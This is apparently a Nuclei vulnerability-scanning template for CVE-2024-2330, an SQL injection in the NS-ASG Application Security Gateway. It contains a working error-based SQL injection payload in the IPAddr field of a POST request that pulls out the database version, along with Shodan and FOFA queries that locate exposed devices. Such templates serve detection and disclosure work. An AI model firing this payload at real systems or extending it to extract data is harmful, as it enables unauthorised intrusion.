id: CVE-2024-2330

info:
  name: NS-ASG Application Security Gateway 6.3 - Sql Injection
  author: securityforeveryone
  severity: medium
  description: |
    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2330
    - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md
    - https://vuldb.com/?ctiid.256281
    - https://vuldb.com/?id.256281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-2330
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.15866
  metadata:
    max-request: 2
    shodan-query: http.title:"NS-ASG"
    fofa-query: app="网康科技-NS-ASG安全网关"
  tags: cve,cve2024,ns-asg,sqli

http:
  - raw:
      # The IPAddr field of the addmacbind message carries an updatexml() expression,
      # so a vulnerable backend returns the database version inside an XPATH error.
      - |
        POST /protocol/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

    # Match only when the SQL error text is reflected in an HTML response with status 200.
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")'
          - 'status_code == 200'
        condition: and

    # Capture the version string echoed in the error message (prefixed with "~", i.e. 0x7e).
    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '([~0-9.]+)'"
# digest: 4a0a00473045022100dd56769f1200eca719df9454c9c9fd05ea386da88322f43236190beb163a313d02204e3f6924a5390d91d532af0b4bcc1ea440540b8b599520de13a902fc6524bdd2:922c64590222798bb761d5b6d8e72950